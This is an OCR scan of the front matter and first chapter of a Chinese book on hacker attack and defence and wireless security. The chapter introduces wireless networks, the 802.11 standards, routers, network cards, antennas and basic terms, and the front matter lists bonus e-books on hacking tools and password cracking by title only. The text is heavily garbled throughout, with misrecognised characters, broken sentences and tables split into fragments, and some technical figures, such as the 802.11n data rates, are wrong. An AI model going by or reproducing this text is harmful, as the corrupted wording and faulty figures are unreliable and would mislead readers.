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目前 ， 无 线 网 络 安全 问题 日 益 突 出 。 


一 
有 局 


“ 工 欲 善 其 事 必 先 利 其 器 ”， 只 有 选择 合适 的 攻 


防 工具 ， 才 能 起 到 事半功倍 的 作用 。 本 书 除 了 讲解 有 线 端的 攻防 策略 外 ， 还 把 目前 市 场 上 
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展 ， 进 而 达到 “ 知 其 然 ， 并 知 其 所 以 然 ” 的 效果 。 


提示 技巧 ， 贴 心 周 到 : 本 书 对 读者 在 学 习 过 程 中 可 能 遇 到 的 疑难 问题 以 “提示 ”的 形 
式 进行 说 明 ， 以 免 读 者 在 学 习 过 程 中 走 弯 路 。 
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黑客 工具 〈107 个 ) 速 查 电 子 书 。 
常用 黑客 命令 (160 个 ) 速 查 电子 书 。 
180 页 常见 故障 维修 电子 书 。 


Windows 10 系 统 使 用 和 防护 技巧 电子 书 。 


8 大 经 典 密 码 破解 工具 电子 书 。 

加 密 与 解密 技术 快速 入 门 小 白 电子 书 。 
网 站 入 侵 与 黑客 脚本 编程 电子 书 。 
黑客 命令 全 方位 详解 电子 书 。 
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读者 对 象 
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写作 团队 


本 书 由 长 期 研究 网 络 安全 的 网 络 安全 技术 联盟 编著 ， 另 外 还 有 王 秀 喘 、 王 英 英 、 刘 玉 
萍 、 刘 将 、 王 和 打 杀 、 王 攀登 、 王 婷 婷 、 张 芳 、 李 小 威 、 王 猛 、 王 维 维 、 李 佳 康 、 王 秀 荣 、 
王 天 护 、 皮 素 放 等 人 参与 了 编写 工作 。 在 编写 过 程 中 ， 编 者 们 尽 所 能 地 将 最 好 的 讲解 呈现 
给 读者 ， 但 也 难免 有 玖 漏 和 不 妥 之 处 ， 冤 请 不 音 指正 。 硅 您 在 学 习 中 遇 到 困难 或 疑问 ， 或 
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第 1 曹 ” 无 线 网 络 快速 入 门 


无 线 网 络 ， 特 别 是 无 线 局 域 网 给 我 们 的 生活 带 来 了 极 大 的 方便 ， 为 我 们 提供 了 无 处 不 


在 的 、 高 带宽 的 网 络 服务 ， 但 是 ， 
定性 ， 且 容易 受到 黑客 的 攻击 ， 从 而 大 大 录 
基础 常识 。 


1.1 什么 是 无 线 网 络 


无 线 网 络 (Wireless network) 是 采用 
无 线 通 信 技 术 实 现 的 网 络 ， 与 有 线 网 络 的 
用 途 十 分 类 似 ， 最 大 的 不 同 在 于 传输 媒介 
的 不 同 ， 一 般 来 说 ， 无 线 网 络 可 以 分 为 狭 
义 无 线 网 络 和 广义 无 线 网 络 两 种 。 


1.1.1 狭义 无 线 网 络 

狭义 无 线 网 络 就 是 我 们 常 说 的 无 线 局 
域 网 ， 是 基于 802.11b/g/n 标 准 的 WLAN 无 线 
局 域 网 ， 具 有 可 移动 性 、 安 装 简单 、 高 灵 
活性 和 高 扩展 能 力 等 特点 ， 作 为 对 传统 有 
线 网 络 的 延伸 ， 这 种 无 线 网 络 在 许多 特殊 
环境 中 得 到 了 广泛 地 应 用 ， 如 企业 内 部 、 
学 校内 部 、 家 庭 等 。 这 种 网 络 的 缺点 是 履 
盖 范 围 小 ， 使 用 距离 在 5~30m 内 。 

随 着 无 线 数 据 网 络 解决 方案 的 不 断 推 
出 ， 全 球 WiFi 设 备 迅猛 增长 ， 相 信和 在 不 久 
的 将 来 ，“ 不 论 在 任何 时 间 、 任 何 地 点 都 
可 以 轻松 上 网 ”这 一 目标 就 会 被 实现 ， 下 
面 介 绍 一 些 有 关 无 线 网 络 的 概念 


1. 无 线 网 络 的 起 源 


无 线 网 络 的 起 源 ， 可 以 退 漳 到 第 二 
次 世界 大 战 期 间 ， 当 时 美军 采用 无 线 电 信 
写作 资料 的 传输 ， 他 们 研发 出 了 一 套 无 
线 电 传 输 技术 ， 并 且 采 用 相当 高 强度 的 加 
密 技术 。 当 时 美军 和 盟 军 都 广泛 使 用 这 项 
技术 。 


由 于 无 线 信道 特有 的 性 质 ， 使 得 无 线 网 络 连接 具有 不 稳 
$n 向 了 服务 质量 里 ， 本 草 介 乡 


如 一 些 有 关 无 线 网 络 的 


无 线 电 传 输 技术 让 许多 学 者 得 到 了 有 灵 
感 ， 在 1971 年 时 ， 夏 威 夷 大 学 (University 
of Hawaii) 的 研究 员 创造 了 第 一 个 基于 
封包 式 技术 的 无 线 电 通 信 网 络 ， 被 称 作 
ALOHNET 网 络 ， 这 可 以 算是 相当 早期 的 无 
线 局 域 网 络 (WLAN) 了 。 最 早 的 WLAN 
包括 了 7 台 计 算 机 ， 它 们 采用 双 癌 星 型 拓扑 
(bi-directional star po ， ohh 


几 间 
es 
-ll 


(Oahu i 上 ， 从 那 时 开始 ， 无 线 网 络 国 四 


可 说 是 正式 诞生 了 。 下 图 为 一 个 星 型 拓扑 
结构 示意 图 。 
了 
[人工 、 


2. IEEE 802.11 标 准 


IEEE 802.11 标 准 第 一 个 版 本 发 表 于 
1997 年 ， 其 中 定义 了 介质 访问 接 入 控制 层 
(MAC 层 ) 和 物理 层 。 物 理 层 定义 了 工作 
在 2.4GHz 的 ISM 频 段 上 的 两 种 无 线 调频 方 
式 和 一 种 红外 传输 的 方式 ， 总 数据 传输 速 
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率 设 计 为 2Mb/s。 两 个 设备 之 间 的 通信 可 以 以 自由 直接 〈ad hoc) 的 方式 进行 ， 也 可 以 在 
基站 (Base Station，BS) 或 者 访问 点 (Access Point，AP) 的 协调 下 进行 。 

对 于 无 线 网 络 重要 发 展 标准 ， 用 户 有 必要 了 解 一 下 IEEE 802.11 标 准 的 发 展 过 程 ， 具 
体内 容 见 下 表 。 


标 准 
IEEE 802.11 
IEEE 802.11a 
IEEE 802.11b 
IEEE 802.11c 
IEEE 802.11d 
IEEE 802.1le 
IEEE 802.11f 
IEEE 802.1lg 
IEEE 802.11h 


IEEE 802.111 


IEEE 802.11n 


IEEE 802.11p 


表 802.11 标 准 的 发 展 史 
说 明 

1997 年 ， 原 始 标准 (2Mb/s， 工 作 在 2.4GHz) 
1999 年 ， 物 理 层 补充 (54Mb/s， 工 作 在 5GHz) 
1999 年 ， 物 理 层 补充 (11Mb/s 工 作 在 2.4GHz) 
符合 802.1D 的 媒体 接 入 控制 层 桥 接 (MAC Layer Bridging) 
根据 各 国 无 线 电 规 定做 的 调整 
对 服务 等 级 (Quality of Service,QoS) 的 支持 
基站 的 互 连 性 (IAPPInter-Access Point Protocol) ，2006 年 2 月 被 IEEE 批 准 撤销 
2003 年 ， 物 理 层 补充 〈$4Mb/s， 工 作 在 2.4GHz) 
2004 年 ， 无 线 覆 盖 半 径 的 调整 ， 室 内 (indoor) 和 室外 〈outdoor) 信道 (SGHz 频 段 ) 
2004 年 ， 无 线 网 络 的 安全 方面 的 补充 


2009 年 9 月 通过 正式 标准 ，WLAN 的 传输 速率 由 802.11a 及 802.11g 提 供 的 54Mb/s、108Mb/s， 提 高 至 
350Mb/s 甚 至 高 达 475Mb/s 


2010 年 ， 这 个 协定 主要 用 在 车 用 电子 的 无 线 通 信 上 


目前 ， 无 线 网 络 及 设备 主要 使 用 的 是 
IEEE 802.llb/gmm 标 准 ， 尤 其 以 IEEE 802.llg 
最 为 普及 ， 不 过 IEEE 802.1In 正 在 以 飞快 的 
速度 赶 超 。 

除了 上 面 的 IEEE 标 准 ， 另 外 有 一 个 被 
称 为 IEEE 802.11b+ 的 技术 ， 通 过 PBCC 技 术 
(packet binary convolutional code ) 在 IEEE 
802.11b (2.4GHz 频 段 ) 基础 上 提供 22Mbys 
的 数据 传输 速率 。 但 这 事实 上 并 不 是 一 个 
IEEE 的 公开 标准 ， 而 是 一 项 产权 私有 的 
技术 。 


3. WiFi 联 盟 


WiFi 联 盟 成 立 于 1999 年 ， 是 一 家 全 球 
及 非 营 利 性 的 行业 协会 ， 拥 有 几 百 家 企业 
会 员 ， 致 力 解决 符合 IEEE 802.11 标 准 的 产 
品 的 生产 和 设备 兼容 性 问题 ， 从 而 推动 无 
线 局 域 网 产业 的 发 展 ， 以 增强 移动 无 线 、 


人 便携、 移动 和 家 用 设备 的 用 户 体验 为 目 
标 。 自 2003 年 3 月 WiFi 联 盟 开展 此 项 认证 以 
来 ， 已 经 有 超过 4000 多 种 产品 获得 了 WiFi 
GERTIFIED 指 定 认 证 标志 ， 有 力 地 推动 了 
WiFi 产 品 和 服务 在 消费 者 市 场 和 企业 市 场 
两 方面 的 全 面 开 展 。 

WiFi 联 盟 认 证 标志 就 是 无 线 技 术 支 持 
的 象征 ， 被 广泛 应 用 在 智能 手机 、 平 板 计 算 
机 、 笔 记 本 计算 机 和 各 种 便携 式 设备 上 。 


4. 无 线 网 络 的 组 成 


无 线 网 络 由 以 下 几 个 部 分 组 成 。 

(1) 站 点 〈Station) 。 网 络 最 基本 的 组 
成 部 分 ， 通 第 指 的 就 是 无 线 客户 端 。 

(2) 基本 服务 单元 (Basic Service Set， 
BSS) 。 网 络 最 基本 的 服务 单元 。 最 简单 的 
服务 单元 可 以 只 由 两 个 无 线 客户 端 组 成 ， 
客户 端 可 以 动态 地 连接 (Associate) 到 基本 


服务 单元 中 。 

(3) 分 配 系统 (Distribution System， 
DS) 。 分 配 系统 用 于 连接 不 同 的 基本 服务 
单元 ， 分 配 系 统 使 用 的 媒介 逻辑 上 和 基本 
服务 单元 使 用 的 媒介 是 截然 分 开 的 ， 尽 管 
它们 物理 上 可 能 会 是 同一 个 媒介 ， 例 如 同 
一 个 无 线 频 道 。 

(4) 接 入 点 (Access Point，AP) 。 无 
线 接 入 点 既 有 普通 有 线 接 入 点 的 能 力 ， 又 
有 接 入 到 上 一 层 网 络 的 能 力 。 其 实 AP 和 无 
线路 由 器 是 有 区 别 的 ， 相 比 来 说 ， 无 线路 
由 器 的 功能 更 多 ， 不 过 在 基本 功能 方面 ， 
两 者 并 无 实质 性 的 区 别 ， 所 以 在 实际 应 用 
中 ， 都 会 将 无 线路 由 器 称 为 AP。 

(5) 扩展 服务 单元 (Extended Service 
Set，ESS) 。 由 分 配 系统 和 基本 服务 单元 
组 合 而 成 。 这 种 组 合 是 逻辑 上 的 ， 并 非 物 
理 上 的 ， 不 同 的 基本 服务 单元 有 可 能 在 地 
理 位 置 上 相差 甚 远 。 分 配 系 统 也 可 以 使 用 
各 种 各 样 的 技术 。 

(6) 关口 (Portal) 。 用 于 将 无 线 局 域 
网 和 有 线 局 域 网 或 其 他 网 络 联系 起 来 ， 是 
一 个 逻辑 成 分 。 

以 上 组 成 部 分 使 用 了 3 种 媒介 ， 站 氮 
使 用 的 无 线 媒 介 ， 分 配 系统 使 用 的 媒介 ， 
以 及 和 无 线 局 域 网 集成 一 起 的 其 他 局 域 网 
使 用 的 媒介 ， 物 理 上 它们 可 能 相互 重 登 。 
IEEE 802.11 只 负责 在 站 点 使 用 的 无 线 媒介 
上 寻找 地 址 ， 分 配 系统 和 其 他 局 域 网 的 寻 
址 不 属于 无 线 局 域 网 的 范围 。 


5. 无 线 网 络 的 运行 原理 


要 想 建 立 一 个 有 效 运 行 的 无 线 网 络 ， 
首先 需要 至 少 一 个 AP， 如 无 线路 由 器 ， 然 
后 是 至 少 一 个 无 线 客 户 端 ， 即 装 有 无 线 网 
卡 的 便携 式 设备 ， 如 计算 机 、 手 机 、 平 板 
计算 机 等 。 硬 件 准备 完成 后 ，AP 每 100ms 
将 SSID 信 号 封包 广播 一 次 ， 无 线 客 户 端 
可 以 借 此 决定 是 否 要 和 这 一 个 SSID 的 AP 
连接 ， 使 用 者 还 可 以 设 定 要 连接 到 哪 一 个 
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SSID。 这 就 好 比 用 户 使 用 智能 手机 连接 周 
边 的 WiFi 一 样 ， 可 以 有 选择 地 进行 连接 。 
不 过 ，WiFi 系 统 总 是 对 客户 端 开放 其 连接 
标准 ， 并 文 持 漫游 ， 这 是 WiFi 的 优点 。 


1.1.2 厂 义 无 线 网 络 


是 WPAN、WLAN 和 WWAN， 下 面 分别 进 


行 介 绍 
1. WPAN 


WPAN (Wireless Personal Area Net- 
work， 无 线 个 人 局 域 网 通信 技术 ) 即 第 
说 的 无 线 个 人 局 域 网 。 无 线 个 人 局 域 网 
(WPAN) 是 一 种 采用 无 线 连接 的 个 人 局 域 
网 。 它 被 用 在 诸如 电话 、 计 算 机 、 附 属 设 
备 以 及 小 范围 《个 人 局 域 网 的 工作 范围 一 
般 是 在 10m 以 内 ) 内 的 数字 助理 设备 之 间 的 
通信 。 

无 线 个 人 局 域 网 (WPAN) 是 一 种 
与 无 线 广域网 (WWAN) 、 无 线 局 域 网 
(WLAN) 并 列 但 禾 兰 范围 相对 较 小 的 
无 线 网 络 。 在 网 络 构成 上 ，WPAN 位 于 整 
个 网 络 链 的 末端 ， 用 于 实现 同一 地 点 终端 
与 终端 间 的 连接 ， 如 连接 手机 和 蓝牙 耳机 
等 ，WPAN 设 备 具 有 价格 便宜 、 体 积 小 、 
易 操 作 和 功 耗 低 等 优点 。 

支持 无 线 个 人 局 域 网 的 技术 包括 : 蓝 
牙 、ZigBee、 超 频 波 段 (UWB) 、IrDA、 
HomeRF 等 ， 其 中 蓝牙 技术 在 无 线 个 人 局 域 
网 中 使 用 最 广泛 ， 下 面 就 来 介绍 几 种 主要 
的 技术 。 

e 蓝牙 (Bluetooth) : 蓝牙 是 一 种 短 

距离 无 线 通信 技术 ， 它 可 以 用 于 在 
较 小 的 范围 内 通过 无 线 连接 的 方式 
实现 固定 设备 或 移动 设备 之 间 的 网 
络 互 联 ， 从 而 在 各 种 数字 设备 之 间 
实现 灵活 、 安 全 、 低 动 耗 、 低 成 本 
的 语音 和 数据 通信 。 

赣 牙 技术 的 一 般 有 效 通信 范围 为 10m， 
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强 的 可 以 达到 100m 左 右 ， 其 最 高 速率 可 达 
1Mb/s。 其 传输 使 用 的 功 耗 很 低 ， 广 泛 应 用 
于 无 线 设 备 ， 如 平板 计算 机 、 手 机 、 智 能 
话 等 领域 。 下 图 为 一 个 智能 手机 的 蓝牙 设置 
界面 ， 在 其 中 可 以 开启 与 关闭 蓝牙 。 


中 国电 信 本 日 书 iD 会 从中 划 15:48 
蓝牙 

并 天 
a ED 
开放 检测 
允许 周围 设备 检测 到 (01:40) ,©®, 
设备 名 称 HUAWEI MAIMANG 5 
接收 的 文件 


可 用 设备 
E8:E1:BC:3C:1F:30 


没有 搜索 到 目标 设备 ? 查看 可 能 原因 


e IrDA (红外 ) : IDA 是 红外 数据 组 
织 (Infrared Data Association) 的 简 
称 ， 目 前 广泛 采用 的 IIDA 红 外 连接 
技术 就 是 由 该 组 织 提 出 的 ， 到 目前 
为 止 ， 全 球 采 用 IrDA 技 术 的 设备 超 
过 了 5000 万 部 。 

IrDA 技 术 的 主要 特点 有 : 利用 红外 
传输 数据 ， 无 须 专门 申请 特定 频段 的 使 用 
执照 ， 设 备 体积 小 、 功 率 低 ; 由 于 采用 点 
到 点 的 连接 方式 ， 数 据 传 输 受 到 的 干扰 较 
小 ， 数 据 传 输 速 率 高 ， 可 达 1Gb/s。 但 存在 
一 定 的 技术 缺陷 ， 如 受 视 距 影响 其 传输 距 
离 短 、 要 求 通 信 设 备 的 位 置 固 定 、 其 点 对 
点 的 传输 连接 无 法 灵活 地 组 成 网 络 等 。 


2. WLAN 


WLAN (Wireless Local Area Networks， 无 线 
局 域 网 ) 即 上 面 所 说 的 “狭义 无 线 网 络 ”， 
具体 请 参考 上 面 狭义 无 线 网 络 的 内 容 。 


3. WWAN 


WWAN (Wireless Wide Area Network, 
无 线 广域网 通信 技术 ) 即 常 说 的 无 线 广 域 
网 。WWAN 技 术 是 使 得 笔记 本 计算 机 或 
者 其 他 的 设备 装置 在 蜂 寅 网 络 履 盖 范 围 内 
可 以 在 任何 地 方 连接 到 互联 网 。 目 前 全 球 
的 无 线 广域网 络 主要 采用 GSM 及 CDMA 技 
术 ， 其 他 还 有 3G 或 者 4G 等 技术 。 

简单 地 说 ，WWAN 指 的 就 是 通过 通 
信 设 备 和 通信 网 络 来 上 网 ， 不 管 是 以 前 的 
GSM、EDGE 和 CDMA， 还 是 现在 的 3G、 
4G 网 络 ， 只 要 用 计算 机 中 的 PC 卡 装 SIM 
卡 ， 或 者 把 手机 连 在 笔记 本 计算 机 上 当 作 
Modem 连 网 ， 都 叫 WWAN。 


1.2 ”认识 无 线路 由 器 


无 线路 由 器 是 应 用 于 用 户 上 网 、 带 有 
无 线 履 盖 功 能 的 路 由 器 ， 它 和 有 线路 由 器 
的 作用 是 一 样 的 ， 唯 一 的 不 同 就 是 无 线路 由 
髓 的 顶部 或 者 尾部 多 了 一 个 或 者 几 个 天 线 ， 
其 作用 就 是 提供 无 线 网 络 的 支持 。 除 此 以 
外 ， 其 他 无 论 是 外 观 ， 或 者 是 内 在 配置 页 面 
都 和 同 款 型 的 有 线路 由 器 一 模 一 样 。 

市 面 上 每 一 个 厂商 的 无 线 产 品 都 有 
自己 的 特点 ， 下 图 为 美 版 思科 Linksys 
WRT1900AC 双 频 无 线路 由 器 ， 该 路 由 器 具 
有 4 个 天 线 ， 文 持 用 户 根 据 需 要 对 天 线 进行 
拆卸 和 换 装 ， 非 常 方便。 另外 ， 该 路 由 器 
文 持 802.11b/g 协 议 ， 其 特点 是 使 用 多 个 无 
线 来 分 工 进 行 无 线 数据 的 接收 与 发 送 。 


目前 ， 市 场 占有 率 比 较 高 的 无 线路 由 
器 是 TP-LINK， 其 性 价 比 比较 高 。 下 图 为 
TP-LINK 千 兆 无 线路 由 器 ， 具 有 高 速 双 核 、 
覆盖 更 远 、 家 长 控制 、 一 键 禁用 等 功能 。 
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为 方便 大 家 选 购 无 线路 由 器 ， 下 面 
把 目前 市 面 上 第 见 的 无 线 设备 三 商 列 举 出 
来 ， 包 括 厂商 名 称 、 官 方 网 站 以 及 个 人 建 
议 等 信息 见 下 表 。 


表 常见 无 线路 由 器 


厂商 名 称 
Linksys 〈 领 势 ) 
D-LINK ( 友 讯 ) 
TP-LINK ( 普 联 ) 
Netgear (网 件 ) 
ASUS (华硕 ) 
Tenda〔 腾 达 ) 


MERCURY (水 星 ) 


1.3 了 了 解 无 线 网 卡 


对 于 初次 接触 无 线 网 络 的 用 户 来 说 ， 
无 线 网 卡 与 无 线 上 网 卡 是 有 些 迷 惑 的 ， 本 
节 束 来 介绍 什么 是 无 线 网 卡 ， 什 么 是 无 线 
上 网 卡 。 


1.3.1 无 线 网 卡 


无 线 网 卡 是 终端 无 线 网 络 设备 ， 是 不 
通过 有 线 连 接 ， 采 用 无 线 信号 进行 数据 传 
输 的 终端 ， 有 时 也 被 称 为 WiFi 卡 ， 根 据 
接口 类 型 的 不 同 ， 主 要 有 PCMCIA 无 线 网 
卡 、PCI 无 线 网 卡 、Mini-PCI 无 线 网 卡 、 
USB 无 线 网 卡 、CF/SD 无 线 网 卡 几 类 。 

PCI 无 线 网 卡 ; 主要 用 于 台式 计算 机 
中 ， 下 图 为 TP-LINK 出 品 的 PCI 无 线 网 卡 。 


性 价 比较 高 ， 市 场 占有 率 较 高 
价格 较 高 ， 性 能 比较 稳定 


个 人 建议 


PCMCIA 无 线 网 卡 : 主要 用 于 笔记 本 计 
算 机 中 ， 下 图 为 Linksys 出 品 的 PCMCIA 无 
线 网 卡 。 


USB 无 线 网 卡 : 这 种 网 卡 不 管 是 台子 
机 用 户 还 是 笔记 本 用 户 ， 只 要 安装 了 驱动 
程序 ， 都 可 以 使 用 ， 下 图 为 LB-LINK 出 品 
的 USB 无 线 网 卡 。 
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Mini-PCI 无 线 网 卡 : Mini-PCI 为 内 置 型 
无 线 网 卡 ， 被 广泛 应 用 于 笔记 本 计算 机 之 
中 ， 其 优点 是 无 须 占 用 PC 卡 或 USB 插 槽 ， 
并 且 免 去 了 随时 随身 携 一 张 PC 卡 或 USB 卡 
的 麻烦 。 

这 几 种 无 线 网 卡 在 价格 上 差距 不 大 ， 
在 性 能 和 功能 上 也 差不多 ， 用 户 可 根据 自 
己 的 需要 来 选择 。 在 距离 上 来 说 ， 无 线 网 
卡 是 依靠 接收 附近 无 线 网 络 信号 来 上 网 
的 ， 这 个 信号 源 不 能 离 得 太 远 ， 一 般 无 线 
网 卡 是 配合 无 线路 由 器 来 使 用 的 ， 使 用 距 
离 在 5~30m 内 。 


无 线 上 网 卡 指 的 是 无 线 广 域 网 卡 ， 是 依 


。 靠 接收 无 线 宽带 运营 商 在 公共 场所 发 出 的 网 


络 信号 来 上 网 的 ， 这 个 信号 源 可 以 离 无 线 上 
网 的 计算 机 很 远 ， 如 联通 的 CDMA1IX 上 网 
卡 、 移 动 的 GPRS 无 线 上 网 卡 、 电 信 的 EVDO 


gp 无 线 上 网 卡 以 及 移动 联通 的 3G 卡 、4G 卡 等 。 


无 线 上 网 卡 的 作用 于 功能 相当 于 有 线 的 


党 Si 调制 解 调 器 ， 也 就 是 我 们 俗称 的 “ 猫 ”， 它 


可 以 在 拥有 无 线 信 号 覆盖 的 任何 地 方 ， 利 用 
无 线 上 网 卡 来 连接 到 互联 网 上 。 从 理论 上 
来 讲 ， 假 如 你 购买 了 移动 的 无 线 上 网 卡 ， 
那么 在 有 移动 基站 信号 履 盖 的 地 方 都 可 以 
进行 无 线 上 网 。 

一 般 来 讲 ， 无 线 上 网 卡 的 信号 强度 
要 比 有 线 网 卡 差 一 些 ， 但 也 能 满足 一 些 基 
础 的 网 络 应 用 ， 如 浏览 网 页 、 收 发 邮件 、 
网 络 聊天 等 。 不 过 ， 随 着 无 线 网 络 技术 发 
展 ， 尤 其 是 现在 的 EVDO、TD-CDMA 等 
3G/4G 技 术 的 出 现 ， 使 得 无 线 上 网 速度 大 大 
提升 。 下 图 为 中 国电 信和 推出 的 天 如 4G 无 线 
上 网 卡 。 


无 线 上 网 卡 一 般 只 针对 笔记 本 计算 机 
用 户 ， 常 用 的 接口 类 型 为 USB 接 口 ， 但 也 
有 PCMCIA 接 口 类 型 的 ， 下 图 为 中 兴 的 4G 
无 线 上 网 卡 ， 作 为 硬件 ， 一 般 在 用 户 购买 
无 线 上 网 套餐 的 时 候 ， 运 营 商 会 赠送 无 线 
上 网 卡 。 


1.4 了 解 天 线 


无 线 局 域 网 中 的 天 线 可 以 扩展 无 线 网 
络 的 上 禾 兰 范围 ， 天 线 有 多 种 类 型 ， 根 据 方 
加 性 的 不 同 ， 天 线 分 为 全 同和 定 癌 两 种 。 


1.4.1 全 向 天 线 


全 回 天 线 ， 即 在 水 平方 向 上 表现 为 
360” 均匀 辐射 ， 也 就 是 平 利 所 说 的 无 方 
回 性 ， 在 垂直 方向 上 表现 为 有 一 定 宽度 的 
波束 ， 一 般 情况 下 波 因 宽度 越 小， 增益 越 
大 。 全 同 天 线 在 移动 通信 系统 中 一 般 应 用 
于 郊 县 大 区 制 的 站 型 ， 和 覆盖 范围 大 。 下 图 
为 连接 在 无 线 网 卡 上 的 全 癌 天 线 。 


室内 全 癌 天 线 适 合 于 无 线路 由 器 、AP 
这 样 的 需要 广泛 履 头 信号 的 设备 上 ， 它 可 
以 将 信号 均匀 分 布 在 中 心 扣 周围 360” 全 方 
位 区 域 ， 适 用 于 连接 点 距离 较 近 ， 分 布 角 
度 范 围 大 ， 且 数量 较 多 的 情况 ， 如 无 线路 
由 胡 上 的 和 天线， 就 是 室内 全 同 天 线 。 下 图 
为 目前 常见 的 无 线路 由 器 形状 。 


那么 简单 地 讲 ， 全 向 天 线 就 相当 于 以 
天 线 为 圆心 ， 其 传输 距离 为 半径 ， 画 一 个 
圆 ， 这 个 圆 内 就 是 无 线 信 号 的 覆盖 范围 ， 
一 般 来 说 ， 在 实际 应 用 过 程 中 ， 半 径 多 为 
10 一 30m， 这 也 是 为 什么 能 在 街道 探测 到 那 
些 穿 出 墙壁 的 路 由 器 信号 的 原因 之 一 。 

如 果 将 全 同 天 线 安 装 在 户外 ， 则 必须 
安装 在 大 楼 顶端 或 高 处 ， 并 且 位 于 信号 禾 
盖 区 的 中 央 位 置 ， 以 便于 其 他 指向 性 天 线 
装置 通信 ， 构 成 单 点 对 多 点 的 星 型 拓扑 。 


1.4.2 ”定向 天 线 


定 同 天 线 ， 在 水 平方 同上 表现 为 一 
定 角 度 范 围 辐射 ， 也 就 是 平常 所 说 的 有 方 
器 性。 同 全 加 天 线 一 样 ， 波 办 宽度 越 小 ， 
增益 越 大 。 定 同 天 线 在 通信 系统 中 一 般 应 
用 于 通信 距离 远 ， 禾 六 范围 小 ， 目 标 密 废 
大 ， 频 率 利用 率 高 的 环境 。 

定 问 天 线 有 各 种 不 同 的 款式 与 形状 ， 
如 Patch 天 线 、Panel 天 线 和 八木 天 线 等 ， 经 


常用 于 无 线 区 域 网 络 中 短 距离 的 桥接 ， 例 
如 ， 跨 马路 的 两 栋 大 楼 ， 或 者 空间 扩展 的 
厂房 、 仓 库 等 。 

用 户 也 可 以 按 以 下 方式 来 思考 全 向 天 
线 和 定向 天 线 之 间 的 关系 : 全 辐 天 线 会 向 
四 面 八 方 发 射 信号 ， 前 后 左右 都 可 以 接收 
到 信号 ， 定 向 天 线 就 好 像 在 天 线 后 面 日 一 
个 碗 状 的 反射 面 ， 信 号 只 能 向 前 面 传递 ， 
射 问 后 面 的 信号 被 反射 面 挡住 并 反射 到 前 
方 ， 加 强 了 前 面 的 信号 强度 ， 可 以 想象 定 
向 天 线 的 主要 辐射 范围 像 一 个 倒立 的 不 太 
完整 的 圆锥 。 

此 外 ， 还 有 专门 用 于 长 距离 通信 的 高 
方向 性 天 线 ， 有 极 窗 的 波束 宽度 和 很 高 的 
增益 值 ， 也 被 称 为 高 增益 指向 性 天 线 ， 如 
碟 形 天 线 和 格 状 天 线 ， 通 常用 于 点 对 点 的 
通信 连接 ， 传 输 距 离 高 达 40km。 因 为 波束 
非常 窗 ， 因 此 天 线 彼此 之 间 必 须要 很 精准 
地 瞄准 ， 而 且 天 线 之 间 的 直 视 必须 没有 任 
何 阻碍 物 。 

通过 上 文 能 够 形象 地 认识 到 什么 是 全 
向 天 线 ， 什 么 是 定向 天 线 ， 那 么 在 实际 应 
用 时 该 注意 些 什么 呢 ? 如 果 需 要 满足 多 个 站 
点 ， 并 且 这 些 站 点 是 分 布 在 AP 的 不 同方 向 
时 ， 需 要 采用 全 向 天 线 ;， 如 果 集 中 在 一 个 
方向 ， 建 议 采 用 定向 天 线 ; 另外 还 要 考虑 
天 线 的 接头 形式 是 否 和 AP 匹配 、 天 线 的 增 
益 大 小 等 是 否 符合 自己 的 需求 。 

对 于 室外 天 线 ， 在 安装 的 过 程 中 ， 天 
线 与 无 线 AP 之 间 需 要 增加 防 雷 设备 ， 定 问 
天 线 要 注意 天 线 的 正面 朝向 远 端 站 点 的 方 


向 天线 应 该 安装 在 尽 可 能 高 的 位 置 ， 天 党 疝 迟 
线 和 站 点 之 间 尽 可 能 满足 视 距 ， 即 肉眼 可 租 志 光 


见 ， 中 间 避 开 障 碍 。 


1.5 ”部 悉 无 线 网 络 的 术语 


下 面 是 无 线 网 络 安全 中 常会 涉及 的 基 


本 术语 ， 了 解 这 些 术 语 ， 可 以 帮助 用 户 更 
好 地 维护 无 线 网 络 安全 。 


黑客 攻防 与 无 线 巡 全 从 新 手 到 高 手 ( 超 值 版 ) 


(1) WiFi。WiFi 是 一 种 允许 电子 设备 
连接 到 一 个 无 线 局 域 网 (WLAN) 的 技 
术 ， 通 常 使 用 2.4G UHF 或 5G SHF ISM 射 
频频 段 。 连 接 到 无 线 局 域 网 通常 是 有 密码 
保护 的 ; 但 也 可 是 开放 的 ， 这 样 就 允许 在 
WLAN 范围 内 的 任何 设备 可 以 连接 上 。 

(2) SSID。SSID (Service Set Identi- 
fier， 服 务 集 标 识 符 ) 技术 可 以 将 一 个 无 
线 局 域 网 分 为 几 个 需要 不 同 身 份 验证 的 子 
网 络 ， 每 一 个 子 网 络 都 需要 独立 的 身份 验 
证 ， 只 有 通过 身份 验证 的 用 户 才 可 以 进入 
相应 的 子 网 络 ， 防 止 未 被 授权 的 用 户 进 入 
本 网 络 。SSID 可 以 是 任何 字符 ， 最 大 长 度 
为 32 个 字符 。 

(3) WAP。WAP (Wireless Application 
Protocol， 无 线 应 用 协议 ) 是 一 项 全 球 性 的 
网 络 通 信 协 议 。 它 使 移动 Internet 有 了 一 个 
通行 的 标准 ， 其 目标 是 将 Intermet 的 丰富 信 
恩 及 先进 的 业务 引入 到 移动 电话 等 无 线 终 
端 之 中 。 

(4) AP。Wireless Access Point， 无 线 
访问 接 入 点 。AP 就 是 传统 有 线 网 络 中 的 
Hub， 也 是 组 建 小 型 无 线 局 域 网 时 最 常用 的 
设备 。AP 相当 于 一 个 连接 有 线 网 和 无 线 网 
的 桥 染 ， 其 主要 作用 是 将 各 个 无 线 网 络 客 
户 端 连接 到 一 起 ， 然 后 将 无 线 网 络 接 入 以 
太 网 。 


($5) WEP。WEP (Wired Equivalent Pri- 
vacy) 是 目前 比较 常用 的 无 线 网 络 认 证 机 
制 之 一 ， 它 是 802.11 定义 下 的 一 种 加 密 方 
式 ， 简 单 地 说 ， 就 是 先 在 无 线 AP 中 设 定 一 
组 密码 ， 使 用 者 要 连接 上 这 个 无 线 AP 时 ， 
必须 输入 设置 的 密码 才能 连接 上 ， 可 以 有 
效 防止 非法 用 户 拐 听 或 侵入 无 线 网 络 。 

(6) WPA。WPA (WiFi1 Protected Ac- 
cess) 是 一 种 基于 标准 的 可 互 操作 的 WLAN 
安全 性 增强 解决 方案 ， 可 大 大 增强 现 有 以 
及 未 来 无 线 局 域 网 系统 的 数据 保护 和 访问 
控制 水 平 。 分 为 个 人 WPA-Personal 与 企业 
WPA-Enterprise 两 种 。 

(7) EAP。EAP (Extensible Authentica- 
tion Protocol， 扩 展 认 证 协议 ) 是 一 种 用 于 
验证 网 络 设备 喘 份 的 鉴 权 机 制 |。 

(8) GPS。 (Global Positioning System 
全 球 定位 系统 ) 又 称 全 球 卫 星 定位 系统 ， 是 
